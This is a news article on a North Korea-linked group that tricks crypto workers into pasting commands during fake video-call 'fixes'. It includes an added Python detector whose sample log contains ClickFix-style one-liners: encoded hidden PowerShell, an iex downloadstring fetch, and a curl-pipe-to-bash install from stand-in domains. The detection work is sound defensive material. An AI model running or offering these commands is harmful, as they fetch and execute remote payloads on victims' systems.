Crypto Pros Lured Into North Korean Cyber Traps: Fake Meetings, Real Heists
A North Korea-linked hacking group is exploiting fake video calls and social engineering to breach crypto professionals across all major platforms.
It began with what seemed like a golden opportunity - a venture capital firm reaching out for a meeting, a due diligence call, or a partnership discussion. But beneath the polished surface of Zoom and Google Meet links, a relentless North Korean cyber operation was in play, targeting the very heart of the digital asset world. The group known as UNC1069 has woven an intricate web of deception, using fake meetings and sophisticated malware to siphon millions from unsuspecting cryptocurrency professionals worldwide.
The operation is as audacious as it is sophisticated. Posing as high-profile investors on platforms like LinkedIn and Telegram, UNC1069 initiates conversations that evolve seamlessly into scheduled “business calls.” Using tools like Calendly and even hijacked legitimate accounts, the attackers build trust before springing their trap - a link to a meeting portal that perfectly mimics Zoom, Google Meet, or Microsoft Teams.
Once inside these portals, the attack kicks into high gear. Victims are told of technical issues - missing updates, audio glitches, or required SDKs - and pressured to paste commands into their system’s terminal or PowerShell window, a tactic known as “ClickFix.” On Windows, the pasted command sets off a cascade of obfuscated scripts that disable security tools, steal browser data, and establish long-term control. On macOS and Linux, similar techniques deploy RATs (remote access trojans) that bypass built-in protections, all while masquerading as legitimate software updates.
But the deception doesn’t end with malware. UNC1069’s fake portals double as surveillance hubs, quietly capturing microphone and camera feeds using standard browser APIs. This stolen footage can be recycled into future social engineering ploys, or even deepfakes - making the next round of attacks even harder to spot.
The infrastructure behind these scams is sprawling. Dozens of attacker-controlled domains mimic both meeting platforms and investment firms, while technical fingerprints link the campaign to notorious North Korean operations like Bluenoroff and CryptoCore. Google and other security researchers have traced the group’s activities to high-profile supply-chain attacks, including developer-targeted malware hidden in popular npm packages.
For the crypto and Web3 sector, the message is clear: unsolicited investment approaches and “urgent” calls - even from familiar names - should trigger maximum caution. Experts recommend strict verification of counterparties, prohibiting employees from executing commands during calls, and closely monitoring for suspicious system activity during collaboration sessions.
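The ClickFix tactic described above, together with the recommendation to monitor system activity during calls, can be turned into a concrete detection. The following is an added example, not code from the article or from any researcher it cites: it parses constructed process-creation records (a simplified key=value layout loosely modelled on Sysmon Event ID 1, not a real log format), scores each command line for the hallmarks of a pasted download-and-run one-liner, and raises a finding when an interactively launched shell crosses a threshold. The domains, user names and weights are all assumptions chosen for illustration.

```python
"""Score process-creation records for ClickFix-style pasted commands.

Added example, not from the article. The log format, the sample records,
the indicator weights and the threshold are constructed assumptions.
"""
import re
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

# Shells a victim is typically told to paste into during a fake "meeting fix".
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "zsh", "sh"}

# Parents that indicate a human typed or pasted the command (Run dialog,
# terminal) rather than a service or scheduler launching it. Constructed list.
USER_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe",
                "terminal", "iterm2", "gnome-terminal-server"}

# (pattern, weight, label). Each pattern is a common idiom in hidden,
# policy-bypassing, download-and-execute one-liners.
INDICATORS = [
    (re.compile(r"(?i)\s-e(c|nc|ncodedcommand)?\s"), 3, "encoded command"),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), 2, "hidden window"),
    (re.compile(r"(?i)-e(p|x(ecutionpolicy)?)\s+bypass"), 2, "execution policy bypass"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), 3, "invoke-expression"),
    (re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                r"\bcurl\b|\bwget\b|net\.webclient)"), 2, "remote download"),
    (re.compile(r"(?i)\|\s*(ba)?sh\b"), 3, "pipe to shell"),
]

INTERACTIVE_WEIGHT = 2   # bonus when the parent is a user-facing launcher
THRESHOLD = 6            # minimum score that produces a finding


@dataclass
class Finding:
    user: str
    image: str
    score: int
    reasons: List[str] = field(default_factory=list)


def parse_record(line: str) -> dict:
    """Parse one 'key=value key="quoted value"' record (constructed format)."""
    rec = {}
    for token in shlex.split(line):
        key, sep, value = token.partition("=")
        if sep:
            rec[key] = value
    return rec


def score_record(rec: dict) -> Optional[Finding]:
    """Return a Finding for shell launches; None for non-shell processes."""
    image = rec.get("image", "").lower()
    if image not in SHELLS:
        return None
    cmd = rec.get("cmd", "")
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(cmd):
            score += weight
            reasons.append(label)
    if rec.get("parent", "").lower() in USER_PARENTS:
        score += INTERACTIVE_WEIGHT
        reasons.append("interactive parent")
    return Finding(rec.get("user", "?"), image, score, reasons)


def detect(lines: List[str], threshold: int = THRESHOLD) -> List[Finding]:
    """Return findings whose score meets the threshold, in log order."""
    hits = []
    for line in lines:
        finding = score_record(parse_record(line))
        if finding and finding.score >= threshold:
            hits.append(finding)
    return hits


# Constructed sample records: two Windows ClickFix pastes, one macOS paste,
# two benign PowerShell launches and one browser launch that is not scored.
SAMPLE_LOG = [
    'ts=2024-01-01T10:00:00Z user=alice parent=explorer.exe image=powershell.exe '
    'cmd="powershell.exe -w hidden -ep bypass -enc SQBFAFgA"',
    'ts=2024-01-01T10:02:00Z user=bob parent=explorer.exe image=cmd.exe '
    'cmd="cmd.exe /c powershell -c iex (new-object net.webclient)'
    '.downloadstring(\'https://meeting-sdk-update.example/fix\')"',
    'ts=2024-01-01T10:05:00Z user=carol parent=windowsterminal.exe image=powershell.exe '
    'cmd="powershell.exe Get-ChildItem -Recurse"',
    'ts=2024-01-01T10:06:00Z user=SYSTEM parent=svchost.exe image=powershell.exe '
    'cmd="powershell.exe -ExecutionPolicy Bypass -File C:/scripts/backup.ps1"',
    'ts=2024-01-01T10:09:00Z user=dave parent=terminal image=zsh '
    'cmd="curl -fsSL https://zoom-sdk-fix.example/install.sh | bash"',
    'ts=2024-01-01T10:10:00Z user=erin parent=explorer.exe image=chrome.exe '
    'cmd="chrome.exe https://meet.example/j/1234"',
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f"{hit.user:6} {hit.image:15} score={hit.score} {', '.join(hit.reasons)}")
```

The scoring deliberately requires more than one signal: a scheduled backup that runs with `-ExecutionPolicy Bypass` from a service scores too low to fire, and so does a plain `curl` typed in a terminal, while the pasted one-liners combine hiding, bypass, remote fetch and interactive launch and cross the threshold. In a real deployment the same logic would be fed from endpoint telemetry and the weights tuned against the organisation's own baseline.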
As UNC1069 evolves, blending technical prowess with social engineering, the threat to the digital finance ecosystem grows ever more sophisticated. In a world where a single click can open the door to millions in losses, vigilance and skepticism are the new currencies of survival.
WIKICROOK
- Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.
- RAT (Remote Access Trojan): A RAT is malware that lets attackers secretly control a victim’s device remotely, accessing files and system functions.
- Obfuscated Script: An obfuscated script is code that’s deliberately scrambled or layered to make it hard for people and security tools to interpret or detect.
- Deepfake: A deepfake is AI-generated media that imitates real people’s appearance or voice, often used to deceive by creating convincing fake videos or audio.
- Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.